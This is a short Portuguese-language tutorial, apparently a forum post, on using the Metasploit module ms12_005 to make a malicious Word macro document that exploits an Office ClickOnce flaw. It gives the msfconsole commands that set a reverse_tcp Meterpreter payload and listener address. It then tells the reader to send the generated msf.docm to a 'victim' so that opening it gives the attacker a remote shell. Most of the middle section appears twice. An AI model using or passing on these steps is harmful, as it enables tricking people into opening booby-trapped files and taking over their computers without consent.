Este módulo explora uma vulnerabilidade encontrada noMicrosoft Office Click Once Unsafe. Ao manusear um documento Macro, a aplicação deixa de reconhecer certas extensões de arquivos executáveis como perigosas, que podem ser usadas para ignorar a mensagem de aviso. Isso permite que você enganar a sua vítima a abrir o documento malicioso, que irá carregar tanto uma carga python ou ruby com base na sua escolha, e, finalmente, baixar e executar o nosso executável.
Exploit Metas
Microsoft Office Word 2007/2010
Windows XP SP 2
Windows 7
Exigência
Atacante : Backtrack 5
Vítima PC : Windows 7
Abrir terminal msfconsole
Agora digite use exploit/windows/fileformat/ms12_005
Depois conseguimos gerar o arquivo de documento malicioso, ele será armazenado em seu computador local
/root/.msf4/local/msf.docm
Agora envie o seu msf.docm para vítima, assim que ela baixar e abri-lo você pode acessar o Meterpreter shell no computador da vítima.
Exploit Metas
Microsoft Office Word 2007/2010
Windows XP SP 2
Windows 7
Exigência
Atacante : Backtrack 5
Vítima PC : Windows 7
Abrir terminal msfconsole
Agora digite use exploit/windows/fileformat/ms12_005
Código:
Msf exploit (ms12_005)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms12_005)>set lhost 192.168.1.4 (IP of Local Host) Msf exploit (ms12_005)>exploit
Depois conseguimos gerar o arquivo de documento malicioso, ele será armazenado em seu computador local
/root/.msf4/local/msf.docm
Agora envie o seu msf.docm para vítima, assim que ela baixar e abri-lo você pode acessar o Meterpreter shell no computador da vítima.
Comment